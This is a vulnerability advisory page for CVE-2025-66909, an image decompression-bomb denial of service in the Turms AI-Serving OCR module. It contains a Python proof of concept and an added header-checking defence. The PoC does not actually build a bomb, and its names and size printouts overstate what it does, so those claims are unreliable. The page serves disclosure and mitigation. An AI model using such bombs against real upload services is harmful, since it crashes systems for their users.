Security Vulnerability Report
CVE-2025-66909 CVSS 7.5 HIGH

CVE-2025-66909

Published: 2025-12-19 15:15:57
Last Modified: 2026-01-02 19:50:44

Description

Turms AI-Serving module v0.10.0-SNAPSHOT and earlier contains an image decompression bomb denial of service vulnerability. The ExtendedOpenCVImage class in ai/djl/opencv/ExtendedOpenCVImage.java loads images using OpenCV's imread() function without validating dimensions or pixel count before decompression. An attacker can upload a specially crafted compressed image file (e.g., PNG) that is small when compressed but expands to gigabytes of memory when loaded. This causes immediate memory exhaustion, OutOfMemoryError, and service crash. No authentication is required if the OCR service is publicly accessible. Multiple requests can completely deny service availability.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:turms-im:turms:0.10.0-snapshot:*:*:*:*:*:*:* - VULNERABLE
Turms AI-Serving v0.10.0-SNAPSHOT and earlier versions
DJL OpenCV ExtendedOpenCVImage (all versions)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import os

import cv2
import numpy as np
import zlib


def create_decompression_bomb(width=50000, height=50000, output_path='bomb.png'):
    """
    Create a small PNG file that expands to massive size when decoded.
    This PoC demonstrates the decompression bomb vulnerability in ExtendedOpenCVImage.

    Note: width/height only document the target geometry; the function below
    writes a 100x100 image and reports its compression statistics.
    """
    # Create a small image with repeated pattern that compresses extremely well
    # A 50000x50000 single-color image would be ~2.5GB when decoded
    small_size = 100
    img = np.zeros((small_size, small_size), dtype=np.uint8)
    img[:] = 128  # Uniform gray image - compresses very well

    # Save as PNG
    cv2.imwrite(output_path, img)

    # Analyze the file on disk
    original_size = os.path.getsize(output_path)

    # Calculate expanded size (8-bit grayscale: one byte per pixel)
    expanded_size = small_size * small_size  # bytes

    print(f"Original compressed size: {original_size} bytes")
    print(f"Expanded size: {expanded_size} bytes ({expanded_size / (1024**3):.2f} GB)")
    print(f"Compression ratio: 1:{expanded_size // original_size}")
    print(f"PoC file created: {output_path}")
    return output_path


# Alternative: Create a true decompression bomb using nested compression
def create_true_bomb():
    """
    Create a true decompression bomb using nested zlib compression.
    This creates a small file that expands to GBs when decompressed.
    """
    # Create data that compresses extremely well
    data = b'\x00' * 1000000  # 1MB of zeros

    # Compress it
    compressed = zlib.compress(data, level=9)

    # Create a PNG with nested compression (simplified representation)
    # In practice, this requires careful PNG structure manipulation
    print(f"Compressed size: {len(compressed)} bytes")
    print(f"Expanded size: {len(data)} bytes")
    print("Note: True PNG bombs require specific structure manipulation")


if __name__ == '__main__':
    create_decompression_bomb()
    create_true_bomb()
```
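The defensive counterpart to the description and the PoC above, as an added example written for this page (it is not code from Turms, DJL or the linked advisory): before any decoder is invoked, read only the image header, derive the declared width, height, bit depth and channel count, estimate what imread() would have to allocate, and refuse the upload when it exceeds a policy limit. It goes slightly beyond the advisory's PNG case by handling JPEG SOF headers as well. The function names, the two policy thresholds (50 megapixels, 256 MiB) and the sample headers are this example's own assumptions; in the Java module the equivalent check belongs immediately before the imread() call in ExtendedOpenCVImage. Note that OpenCV's imgcodecs also enforces its own limits (tunable through the OPENCV_IO_MAX_IMAGE_PIXELS, OPENCV_IO_MAX_IMAGE_WIDTH and OPENCV_IO_MAX_IMAGE_HEIGHT environment variables); an application-level check like this one should be layered on top, not used as a reason to skip verifying what the bundled OpenCV build's defaults actually are.

```python
"""Pre-decode image size guard (added example; not Turms, DJL or advisory code).

Reads only the header to learn the declared geometry, estimates what imread()
would allocate, and rejects the upload before any decoder runs. Function names
and the policy limits below are this example's own assumptions.
"""
import struct
import zlib

PNG_SIGNATURE = b"\x89PNG\r\n\x1a\n"
# Samples per pixel by PNG colour type: 0 grey, 2 RGB, 3 palette, 4 grey+alpha, 6 RGBA
PNG_CHANNELS = {0: 1, 2: 3, 3: 1, 4: 2, 6: 4}
MAX_PIXELS = 50_000_000                 # hypothetical policy: ~50 MP is ample for OCR input
MAX_DECODED_BYTES = 256 * 1024 * 1024   # hypothetical policy: per-request decode budget


class ImageTooLarge(ValueError):
    """Declared geometry exceeds the decode budget."""


def png_dimensions(data):
    """Return (width, height, bit_depth, channels) from IHDR, or None if not a PNG."""
    if not data.startswith(PNG_SIGNATURE):
        return None
    if len(data) < 33:
        raise ValueError("truncated PNG header")
    length, ctype = struct.unpack(">I4s", data[8:16])
    if ctype != b"IHDR" or length != 13:       # the spec requires IHDR as the first chunk
        raise ValueError("IHDR must be the first chunk")
    width, height, depth, colour = struct.unpack(">IIBB", data[16:26])
    if colour not in PNG_CHANNELS:
        raise ValueError("unknown PNG colour type %d" % colour)
    return width, height, depth, PNG_CHANNELS[colour]


def jpeg_dimensions(data):
    """Walk marker segments to the first SOFn; return (width, height, precision, components)."""
    if not data.startswith(b"\xff\xd8"):
        return None
    pos = 2
    while pos + 4 <= len(data):
        if data[pos] != 0xFF:
            raise ValueError("corrupt JPEG marker stream")
        marker = data[pos + 1]
        if marker == 0xFF:                                              # padding byte
            pos += 1
            continue
        if marker in (0x01, 0xD8, 0xD9) or 0xD0 <= marker <= 0xD7:     # markers without payload
            pos += 2
            continue
        seg_len = struct.unpack(">H", data[pos + 2:pos + 4])[0]
        if 0xC0 <= marker <= 0xCF and marker not in (0xC4, 0xC8, 0xCC):  # SOF0..SOF15
            if pos + 10 > len(data):
                raise ValueError("truncated SOF segment")
            precision, height, width, comps = struct.unpack(">BHHB", data[pos + 4:pos + 10])
            if height == 0:   # height deferred to a DNL marker: refuse rather than guess
                raise ValueError("JPEG with deferred height (DNL) not accepted")
            return width, height, precision, comps
        pos += 2 + seg_len
    raise ValueError("no SOF marker found")


def estimate_decoded_bytes(width, height, depth, channels):
    """Lower bound on decoder memory: imread()'s default IMREAD_COLOR yields three
    channels even for greyscale input, so budget at least three."""
    return width * height * max(channels, 3) * ((depth + 7) // 8)


def check_image_budget(data, max_pixels=MAX_PIXELS, max_bytes=MAX_DECODED_BYTES):
    """Raise ImageTooLarge when the declared geometry exceeds policy; else return the estimate."""
    dims = png_dimensions(data) or jpeg_dimensions(data)
    if dims is None:
        raise ValueError("unsupported or unrecognised image format")
    width, height, depth, channels = dims
    if width == 0 or height == 0:
        raise ValueError("zero-sized image")
    estimate = estimate_decoded_bytes(width, height, depth, channels)
    if width * height > max_pixels or estimate > max_bytes:
        raise ImageTooLarge("%dx%d would decode to at least %d bytes" % (width, height, estimate))
    return estimate


def is_within_budget(data, **limits):
    """Boolean wrapper for callers that prefer a verdict to an exception."""
    try:
        check_image_budget(data, **limits)
        return True
    except ImageTooLarge:
        return False


# --- constructed test inputs: headers only, no pixel data is needed for the check ---
def make_png_header(width, height, depth=8, colour=0):
    ihdr = struct.pack(">IIBBBBB", width, height, depth, colour, 0, 0, 0)
    crc = zlib.crc32(b"IHDR" + ihdr) & 0xFFFFFFFF
    return PNG_SIGNATURE + struct.pack(">I", 13) + b"IHDR" + ihdr + struct.pack(">I", crc)


def make_jpeg_header(width, height, comps=3):
    sof = struct.pack(">BHHB", 8, height, width, comps) + b"\x01\x11\x00" * comps
    return b"\xff\xd8\xff\xc0" + struct.pack(">H", 2 + len(sof)) + sof


if __name__ == "__main__":
    samples = {
        "100x100 grey PNG": make_png_header(100, 100),
        "50000x50000 grey PNG (the advisory's geometry)": make_png_header(50000, 50000),
        "1920x1080 JPEG": make_jpeg_header(1920, 1080),
    }
    for name, blob in samples.items():
        try:
            print("%-48s accepted, >= %d bytes" % (name, check_image_budget(blob)))
        except ImageTooLarge as err:
            print("%-48s rejected: %s" % (name, err))
```

Because a PNG must begin with IHDR and a JPEG must carry a SOF segment before any scan data, the check needs only the first few dozen bytes of an upload and never touches the compressed pixel stream, so it costs nothing measurable and cannot itself be driven into a large allocation. A file whose declared size passes the check can still be malformed; the point is only that the decoder's worst-case allocation is now bounded by policy rather than by the attacker.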

References

https://github.com/Xzzz111/public_cve_report/blob/main/CVE-2025-66909_report.md (Exploit, Third Party Advisory)
https://github.com/turms-im/turms (Product)
https://github.com/turms-im/turms/blob/develop/turms-ai-serving/src/main/java/ai/djl/opencv/ExtendedOpenCVImage.java#L37 (Product)

Raw JSON Data

```json
{"cve": {"id": "CVE-2025-66909", "sourceIdentifier": "[email protected]", "published": "2025-12-19T15:15:56.670", "lastModified": "2026-01-02T19:50:44.353", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Turms AI-Serving module v0.10.0-SNAPSHOT and earlier contains an image decompression bomb denial of service vulnerability. The ExtendedOpenCVImage class in ai/djl/opencv/ExtendedOpenCVImage.java loads images using OpenCV's imread() function without validating dimensions or pixel count before decompression. An attacker can upload a specially crafted compressed image file (e.g., PNG) that is small when compressed but expands to gigabytes of memory when loaded. This causes immediate memory exhaustion, OutOfMemoryError, and service crash. No authentication is required if the OCR service is publicly accessible. Multiple requests can completely deny service availability."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-409"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:turms-im:turms:0.10.0-snapshot:*:*:*:*:*:*:*", "matchCriteriaId": "9466432E-2863-4A5B-913F-E6E64090F60B"}]}]}], "references": [{"url": "https://github.com/Xzzz111/public_cve_report/blob/main/CVE-2025-66909_report.md", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://github.com/turms-im/turms", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/turms-im/turms/blob/develop/turms-ai-serving/src/main/java/ai/djl/opencv/ExtendedOpenCVImage.java#L37", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/Xzzz111/public_cve_report/blob/main/CVE-2025-66909_report.md", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Third Party Advisory"]}]}}
```